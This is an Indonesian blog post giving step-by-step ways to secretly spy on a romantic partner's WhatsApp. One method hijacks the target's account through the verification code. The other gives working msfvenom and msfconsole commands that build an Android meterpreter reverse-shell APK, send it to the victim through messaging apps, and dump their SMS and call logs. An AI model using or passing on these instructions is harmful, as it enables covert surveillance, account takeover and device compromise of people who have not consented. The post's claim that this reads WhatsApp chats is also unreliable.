Cara Hack Wa Whatsapp Pacar Dengan Aplikasi Termux - Tempat Blogging

Cara Hack Wa Whatsapp Pacar Dengan Aplikasi Termux

WhatsApp menjadi aplikasi Media Sosial paling Popular ketika ini dengan pengguna hampir menyaingi Facebook dan Instagram. Dengan memakai medsos ini akan mempermudah komunikasi baik Chat dengan mengirim gambar, Vidio ataupun melaksanakan panggilan. Dengan banyaknya akomodasi yang diberikan terkadang sepasang kekasih saling mewaspadai dan mencari cara untuk Hack akun WAnya.

Perasaan cemburu terhadap pacar sangat normal terlebih lagi rasa cinta itu sangat mendalam. Mungkin kalau kita inggin mengetahui pacar sedang chat dengan siapa harus membuka HP Androidnya. Nah disini kita akan mencoba melihat aktifitas pasangan tanpa menyentuh smartphone yang bersangkutan.

Ada cara sederhana yaitu tanpa memakai aplikasi dan anda sanggup mencobanya tetapi kalau tidak berhasil ada cara lain yaitu memakai aplikasi Termux. Saran saya cara ini anda gunakan untuk hal yang Positif agar kesudahannya juga baik. Jika pasangan tau anda menghack akun WAnya maka petaka akan tiba alasannya yaitu dogma pasangan akan luntur.

Lihat Juga : Cara mengganti FONT pada status Whatsapp

Sebelum mencobanya silahkan pikir pikir terlebih dahulu apakah anda siap untuk kehilangan dirinya. Terkadang seorang pasangan perlu berteman dan bercanda dengan orang lain. Hal inilah yang dimungkinkan akan terjadi kecemburuan terlebih lagi kalau pasangan anda mempunyai seorang sahabat yang berlawan jenis.

Daripada berfikir panjang silahkan anda coba Tips dan cara Hack WA orang lain, teman, ataupun Pacar dengan mudah. Usahakan anda memakai aplikasi WhatsApp terbaru dan terupdate agar sistem sanggup berjalan dengan baik. Jangan memaksakan memakai aplikasi WA versi yang usang alasannya yaitu kalau gagal itulah penyebabnya.

Cara Hack WA WhatsApp Pacar tanpa Aplikasi :
  1. Langkah awal gunakan aplikasi WA update terbaru
  2. Siapkan Email atau No HP Target
  3. Selanjutnya masuk ke Whatsapp memakai No Handphone tersebut
  4. Lakukan sistem Set Up
  5. Saat WA melaksanakan panggilan silahkan angkat Telpon
  6. PIN juga akan dikirim ke nomor Tujuan
  7. Anda sudah berhasil menyadap nomor WA Pacar

Cara Hack WA WhatsApp Pacar dengan aplikasi Termux :
  1. Langkah pertama silahkan Download termux via google playstore, Selanjutnya buka lalu ketik ifconfig untuk melihat alamat IP anda sendiri.
  2. Berikutnya ketikan msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.166 LPORT=4444 R >hack.apk (LHOST ganti dengan alamat ip anda).
  3. Saat file backdoor sudah jadi, silahkan anda cek atau cari dalam FILE >HOME >hack.apk
  4. Langkah selanjutnya silahkan buka lagi termux dan ketikan perintah di bawah dan pastikan datanya sama menyerupai file backdoor.
  5. msfconsole
    use exploit/multi/handler
    set payload android/meterpreter/reverse_tcp
    set lhost 192.168.43.166
    set lport 4444
    exploit
  6. Berikutnya silahkan mengirim file hack.apk atau backdor tersebut ke ponsel sasaran hack, anda sanggup kirim via wa, bbm, Instagram, Messenger FB atau yang lainya.
  7. Saat sasaran berhasil menginstal apk tersebut maka yang terjadi anda akan lihat meterpreternya.
  8. ketik dump_sms untuk melihat riwayat pesan
  9. ketik dump_calllog untuk melihat histori panggilan
  10. Selesai dan anda sudah berhasil menyadap WA Pasangan atau Pacar.

Itulah dua cara Hack WA Pacar tanpa atau dengan Aplikasi dengan mudah. Jangan gunakan sembarangan dan alangkah baiknya tidak mencobanya kepada pacar kalau relasi anda tidak inggin hancur. Cara sadap WA ini sudah banyak yang mencobanya dan berhasil, kalau anda mengalami kesulitan silahkan ejekan pertanyaan di kolom komentar.


Anda sanggup juga mempelajari banyak sekali macam cara Hack akun Medsos lainnya menyerupai FB, IG dan Twitter. Silahkan berkunjung ke situs ArtikelCara10.Com. Anda akan menemukan banyak sekali macam Tips dan Trik Android terbaru, membobol pasword Wifi dan banyak sekali macam Hacking lainnya. Gunakan dengan masuk akal ya kalau terjadi apapun menjadi tanggung jawab pribadi.

Sumber https://www.mastimon.com/
Show comments
Hide comments

0 Response to "Cara Hack Wa Whatsapp Pacar Dengan Aplikasi Termux"

Post a Comment

Blog ini merupakan Blog Dofollow, karena beberapa alasan tertentu, sobat bisa mencari backlink di blog ini dengan syarat :
1. Tidak mengandung SARA
2. Komentar SPAM dan JUNK akan dihapus
3. Tidak diperbolehkan menyertakan link aktif
4. Berkomentar dengan format (Name/URL)

NB: Jika ingin menuliskan kode pada komentar harap gunakan Tool untuk mengkonversi kode tersebut agar kode bisa muncul dan jelas atau gunakan tool dibawah "Konversi Kode di Sini!".

Klik subscribe by email agar Anda segera tahu balasan komentar Anda

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel

close